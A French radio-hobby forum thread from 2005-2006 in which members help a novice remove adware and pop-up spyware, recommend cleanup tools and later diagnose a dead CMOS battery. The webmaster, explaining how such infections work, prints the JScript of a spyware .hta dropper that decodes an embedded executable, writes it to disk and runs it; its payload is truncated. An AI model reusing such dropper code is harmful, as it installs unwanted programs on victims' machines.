| Sujet : Pépin Internet Nouveau | De JC Négret Le 14-12-2005 à 18:33 cms |
|  |
Bonsoir à tous;
Il me faudrait l'avis de spécialistes...Allant sur le net depuis quelques mois seulement, j'ai voulu chercher de nouveaux smileys sur google. Malgré la mise en garde de mon ordi: "Attention, auteur non identifiable" pour un site de smileys gratuits, j'ai, comme un imbécile que je suis, cliqué dessus ! Le résultat est que depuis quelques jours des écrans publicitaires ou porno apparaissent devant les pages que je consulte: tsf radio forum, radiofil, radiomar, guitar tab, etc...Evidemment, les plus fréquents sont des crazygirls qui se... 
Malgré mes pauvres tentatives (adresses de sites web --> refuser ) rien n'y fait ! (J'en entends qui rigolent...)
Que me suggérez-vous ?
Appeler Patrick ? Consulter un site de nettoyage...lequel ? Appeler un dépanneur ?
Merci d'avance pour tout conseil;
JC le penaud 
| |
|
|
| Sujet : Pépin Internet Nouveau | De Chambrion Pierre Le 14-12-2005 à 18:45 sta |
|
Appeler Patrick ?? noonnnnnnnn !!!!!!!!!
Peut être virer les fichiers internet temporaire ?
Pierre 
|
|
| Sujet : Pépin Internet Nouveau | De Ervé Le 14-12-2005 à 19:20 sta |
|
Bnsoir Jean-Claude
Télécharges et installes ce petit programme,ça fait un an que je le passe toutes les semaines et jamais eu de probléme.Ervé
http://www.01net.com/telecharger/windows/Internet/internet_utlitaire/fiches/26157.html
|
|
| Sujet : Pépin Internet Nouveau | De Pierrot du 82 Le 14-12-2005 à 19:33 cms |
| |
|
| Sujet : Pépin Internet Nouveau | De JC Négret Le 14-12-2005 à 20:45 cms |
| |
Merci pour ces réponses, j'ai déjà Ad-Aware, mais il ne doit pas "être à la page"...
Je vous contacte "de suite" Pierrot.
En tout cas, ça m'aura donné une bonne leçon !
JC 
| |
|
|
| Sujet : Pépin Internet Nouveau | De jackoe Le 14-12-2005 à 20:51 sta |
|
Que font donc ces fameuses "crazygirls" ? ![[:??:]](s11.gif)
|
|
| Sujet : Pépin Internet Nouveau | De JC Négret Le 14-12-2005 à 21:00 cms |
| |
Je sens qu'on n'a pas fini de me vanner avec ça !
Comment dire ? ... 69...et autres classiques !
JC 
| |
|
|
| Sujet : Pépin Internet Nouveau | De jean pierre k\' Le 14-12-2005 à 21:08 cms |
| |
Les BOUUUULLLES  ...!!!!!!!!!  JPK' 
| |
|
|
| Sujet : Pépin Internet Nouveau | De jackoe Le 14-12-2005 à 21:11 sta |
|
Ya rien de tel pour tendre l'atmosphère !
|
|
| Sujet : Pépin Internet Nouveau | De JCJ Le 14-12-2005 à 21:11 sta |
|
Dès que l'on vient d'attraper ce genre de machin indésirable, il suffit d'aller dans l'explorateur de fichier de Window et de demander de lister les fichiers créés ce jour (option "Date",... ), ensuite de les classer selon l'heure de création et de virer tout ce qui a été crée pendant la période suspecte.
Souvent Window refuse de les effacer car ils sont actifs. Il suffit alors de bien noter leur nom, de redémarrer l'ordi en mode "MS-DOS" et de les effacer comme on le faisait dans l'ancien temps du "DOS"... Il faut se souvenir des anciennes commandes DOS, "dir", "cd", "del",...
Jusque là cela à toujour fonctionné...: -)
Ce n'est pas trop tard si vous vous souvenez du jour et de l'heure ou vous avez "attrapé" ce genre de fichier.
|
|
| Sujet : Pépin Internet Nouveau | De JC Négret Le 14-12-2005 à 21:28 cms |
| |
Difficile, ça a commencé dimanche, mais je n'ai pas regardé l'heure.
C'est assez marrant, si l'on peut dire, car en lisant ou en répondant au sujet, les crazygirls et autres demoiselles reviennent toutes les 5 min !
Je crois que je vais arrêter pour ce soir. (fatiguant, à force !)
Merci à tous;
JC
| |
|
|
| Sujet : Pépin Internet Nouveau | De Jacques (webmestre) Le 15-12-2005 à 06:19 cms |
| |
Les fichiers modifiés du jour? Ouais, ca me laisse réveur.... surtout si le truc a été chopé en fin de journée....
C'est un coup a virer un tas de fichier utiles, modifiés en permanence par le système, y compris la base de registre. Le genre de conseil "N'importe quoi"  ...
Ce que vous avez chopé c'est un spyware redirecteur qui vous envoie systématiquement sur le même site et ajoute des bandeaux pop-up indesirables.
Il est installé et exécuté à partir d'un code VB-script récupéré sur un site peu scupuleux.
L'installateur se trouve initialement dans un fichier .hta que vous retrouverez sans doute dans le répertoire temporaire du système. Vous aurez alors le nom et pourrez faire une recherche sur google ou Secuser pour avoir des infos.
Ces types de spyware ne sont en général pas destructifs, mais fortement ennuyeux. Ils installent pas mal de clefs dans la base de registre afin de modifier par exemple la page de démarrage par défaut de IE, se relancer et se réinstaller automatiquement en cas de suppression de fichiers (ré-exécution du .hta de départ), etc...
Ils utilisent la même technique d'installation que certains virus. Le but est de vous inciter à visiter le site et consommer en utilisant des numéros audiotel en 0800.xxxx.xx 
Si vous avez "Information système" dans les outils systèmes, utiliser la commande "outils" puis "Utilitaire de configuration système" puis l'onglet "Démarrage". Vous verrez tous les process mis en route par la base de registre au démarrage: Il y est.
| |
|
|
| Sujet : Pépin Internet Nouveau | De JCJ Le 15-12-2005 à 07:48 sta |
|
Pour Jacques, je n'ai pas dit fichiers "modifiés", mais fichier "créés".
Il est évident que si le jour "J" à "10 h", je trouve un fichier "créé" le même jour à 9h45 et qu'à partir de ce moment ma page d'entrée IE s'ouvre sur une page qui me propose d'acheter du Viagra,... le dit fichier est très suspect.
Cela m'est arrivé plusieurs fois, et la suppression d'un tel fichier à remis tout dans l'ordre...
Il est évident qu'il ne faut pas supprimer des fichiers créés antérieurement ou n'importe quel autre fichier simplement "modifié". 
|
|
| Sujet : Pépin Internet Nouveau | De Jacques (webmestre) Le 15-12-2005 à 09:33 sta |
|
La procédure d'installation de ces spyware se passe en général en 2 temps:
-1/ installation du code necessaire dans un répertoire et d'un lanceur (généralement le menu démarrage)
-2/ installation du spyware par lui-même lors du redemarrage suivant de la machine
Ca peut donc etre le jour suivant, une semaine après... etc
Supprimer les fichiers "à vue de nez" reste de toute façon de la chirurgie au bulldozer, sachant que vous ne supprimez pas pour autant d'autres fichiers liés tels que dll, exe... mais aussi les appels entrés dans la base de registre.
Mieux vaut connaitre son ennemi pour mieux le combattre, et le supprimer.
Il faut savoir aussi que suivant les versions de windows, le système confond la date de création, de dernier accès ou de modification. On peut ainsi avoir des fichiers qui ont été modifiés avant même d'avoir été créés...
| |
|
| Sujet : Pépin Internet Nouveau | De freddy Le 15-12-2005 à 14:36 sta |
|
essayer HITMAN PRO . Tres éficasse gratuis et safe.
|
|
| Sujet : Pépin Internet Nouveau | De JC Négret Le 15-12-2005 à 17:56 cms |
| |
Merci pour vos conseils, je vais voir ça ce W-E. Trois nouveaux sites de Q ce soir !
Un "coller" s'est glissé dans mon Outlook, donc je préfère ne pas le redistribuer aux amis...
JL et les autres, à bientôt...
JC 
| |
|
|
| Sujet : Pépin Internet Nouveau | De JC Négret Le 15-12-2005 à 23:19 cms |
| |
|
| Sujet : Pépin Internet Nouveau | De Pierrot du 82 Le 16-12-2005 à 22:07 cms |
| |
Parfait, Jean-Claude 
Les 2 logiciels sont complémentaires, je préfère passer Spybot S&D en premier, puis Ad-Aware.
Je les passe une fois par semaine environ, à titre préventif, après avoir fait la mise à jour des 2 logiciels, bien sûr ! 
La fonction "vacciner" de Spybot S&D est très intéressante, elle permet d'interdire l'accès aux sites les plus nocifs ! 
Il y a un ou deux spywares particulièrement tenaces qui sont détectés mais non éradiqués par ces 2 logiciels, tel "CoolWebSearch" (barre d'outils et détournement de page de démarrage) et qui demandent une procédure spécifique... 
Donc bravo encore et méfiance 
| |
|
|
| Sujet : Pépin Internet Nouveau | De Jacques (webmestre) Le 17-12-2005 à 06:56 sta |
|
A savoir aussi que pour se sortir d'un mauvais pas comme celui là, le mieux est de redémarrer la machine le moins souvent possible, et s'en occuper tout de suite.
Comme les problèmes émanent surtout de la base de registre, sous XP pas trop de problèmes si vous avez créé un point de restauration récent, ultérieur en tout ca à tout ajout de matériel ou logiciel.
Sous 98, il existe aussi 5 sauvegardes de bases de registre (1 par jour et par démarrage OK)
- Redémarrer la machine en appuyant sur F8
- Choisir MSDOS Seulement dans la fenêtre de sélection
- Taper Scanreg /restore à l'invite MSDOS
- Choisir une date dans les 5 disponibles ultérieure à tout install et antérieure au problème viral.
Ca prend 5 minutes pour repartir de suite, même si les fichiers virus sont encore présents sur le disque, mais désormais inactif. (vérifier quand même menu/démarrage)
|
|
| Sujet : Pépin Internet Nouveau | De JC Négret Le 17-12-2005 à 10:43 cms |
| |
Les ennuis ont repris de plus belle ! 
N'y connaissant absolument rien, je suis dans la m...
Pierrot tentera de m'aider demain.
Bon W-E à tous
JC
| |
|
|
| Sujet : Pépin Internet Nouveau | De JCJ Le 17-12-2005 à 11:30 sta |
|
Si vous avez des noms de sites qui apparaîssent dans vos pages pirates, pouvez vous me les indiquer. J'essaierais de me faire "véroler" et je vous indiquerais les noms de fichiers qu'il faut virer avec ma "méthode bulldozer".
Je navigue sans firewall ni antivirus et j'ai toujours réussi à me débarrasser en 5 minutes de ce genre de cochonneries, même si ce n'est pas dans les règles de l'art…
J'ai Windows 98, et il faut pouvoir démarrer en MS-DOS.
|
|
| Sujet : Pépin Internet Nouveau | De Jacques (webmestre) Le 17-12-2005 à 12:31 sta |
|
Bonne chance...
Les fichiers .hta, initiateurs de l'installation d'un spyware, sont souvent codés pour générer des noms de fichiers aléatoires.
Le but est d'abord d'installer un lanceur (.exe) sur la machine du client, qui assurera le déploiement de l'ensemble du code, de l'installation des .dll. etc...
Pour certains, ils se chargent aussi de renommer des exe ou dll natives de windows et les remplacer par des bouts de codes qui assurent d'autres fonctions.
En exemple, le code (raccourci pour la partie écriture de l'executable) d'un installeur se spyware (fichier hta).
Ici l'exemple est sympa puisqu'il crée un fichier au nom constant pour le lanceur, sous forme d'activeX, à la racine (c:q523345.exe). C'est loin d'etre toujours le cas.
vkgfiob2mG5tsY86Wcr-[1].hta
-------------
<script language=jscript>
try{
self.moveTo(5000,5000);
function b2u(k){
varn="";
for(q=0;q<k.length;){
z=[];
for(h=0;h<8;h++){
z[h]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".indexOf(k.charAt(q++));
}
n+=String.fromCharCode(z[0]<<10|z[1]<<4|z[2]/4,z[2]<<14|z[3]<<8|z[4]*4|z[5]>>4,z[5]<<12|z[6]<<6|z[7]);
}
return n;
}
c=new ActiveXObject("Scripting.FileSystemObject");
fname='c:\q523345.exe';
f=c.CreateTextFile(fname,true);
f.Write('MZ');
f.Close();
f=c.OpenTextFile((fname),8,false,true);
f.Write(b2u("AJAAAw... code hexa de l'exécutable (raccouci ici) ....AAAA"));
f.Close();
(new ActiveXObject("WScript.Shell")).Run(fname);
self.close();
}
catch(e){}
</script>
----------------
|
|
| Sujet : Pépin Internet Nouveau | De JC Négret Le 17-12-2005 à 12:37 cms |
| |
Bonjour JCJ, merci pour votre proposition, ça ne va pas être de la tarte, je ne sais même-pas ce qu'est MS-DOS !
En voici 3 cueillis en 15min, du plus gentil au plus chaud mais il en manque, dont un Gore bien repoussant:
mobileparty.net-Mobileparty-Animations Couleurs
the-best-promos.com-CrazyGirls (plusieurs pages possibles en présentation)
the-best-promos.com-SEXYGIRLS (avec vidéo incorporée)
Je n'ai pas tapé de H tétépé etc, sinon, tout le monde va cliquer dessus et Jacques va m'engueuler (avec raison) !
J'ai Windows XP
JC le cancre
| |
|
|
| Sujet : Pépin Internet Nouveau | De JCJ Le 17-12-2005 à 13:18 sta |
|
Bon,... je fais quelques sauvegardes (on ne sait jamais) et j'y vais...
Si je ne ré-apparait pas d'ici demain c'est que mon ordi est HS...![[:ouin:]](s10.gif)
|
|
| Sujet : Pépin Internet Nouveau | De JCJ Le 17-12-2005 à 13:53 sta |
|
Ces sites ne semblent pas bien méchants… J'ai autorisé l'installation sur mon ordi de programmes "exe" : "InstantAcces" ,"SuperBabes",… et même en les exécutant en ligne, il ne semble pas se passer grand chose… Attendons… ce sont peut être des bombes à retardement…
|
|
| Sujet : Pépin Internet Nouveau | De JC Négret Le 17-12-2005 à 18:08 cms |
| |
J'espère que JCJ ne s'est perdu parmi les Pin-Up... 
J'ai dû ouvrir la porte à une saleté (installée) qui m'envoie ce genre de sites...(Ils ne viennent pas tout-seul ,non ? )
JC
| |
|
|
| Sujet : Pépin Internet Nouveau | De Jacques (webmestre) Le 17-12-2005 à 18:48 cms |
| | |
|
| Sujet : Pépin Internet Nouveau | De JCJ Le 17-12-2005 à 19:36 sta |
|
Non, je suis toujours là
Les sites visités m'ont installés des programmes sans se cacher (icones dans le bureau qui m'ont permis de retrouver facilement les cibles, et programmes lancés automatiquement au démarrage par "msconfig").
Pas de problème pour effacer tout cela...
Parfois c'est beaucoup plus vicieux.
|
|
| Sujet : Pépin Internet Nouveau | De Dominique Le 29-05-2006 à 22:14 sta |
|
Depuis 2 jours, Il faut que je remette mon PC à l'heure à chaque démarrage. Carte mère de 6 ans. Y'a-t-il une pile ou un accu qui serait à l'origine de ce défaut ?
Merci.
Dominique.
|
|
| Sujet : Pépin Internet Nouveau | De Georges Pitropakis Le 29-05-2006 à 23:06 sta |
|
Il y a effectivement une petite pile ronde sur la carte mère.
Georges
|
|
| Sujet : Pépin Internet Nouveau | De Pierrot du 82 Le 30-05-2006 à 02:47 cms |
| |
Possible que ce soit une pile lithium CR-2032, nettoyer les contacts avec un chiffon, puis la réinstaller, sans trop y mettre les doigts...
Ou allors un petit accu CdNickel, tout sulfaté, à remplacer !
Peut-on avoir les renseignements sur la carte mère, marque et chipset ?
J'ai un utilitaire Everest, qui donne tous les renseignements... Me contacter dans ma bal, je l'enverrai par email....
| |
|
|
| Sujet : Pépin Internet Nouveau | De Dominique Le 30-05-2006 à 11:56 sta |
|
Merci pour les infos, je vais regarder ça.
Dominique.
|
|
| Sujet : Pépin Internet Nouveau | De Dominique Le 07-06-2006 à 20:40 sta |
|
Bien vu Pierrot, c'était bien une pile lithium CR-2032. Un échange et le PC est de nouveau à l'heure.
Merci.
Dominique.
|
|
|
Journaux du site au 22/08/2022 à 10:26
!!
!
Enfin...
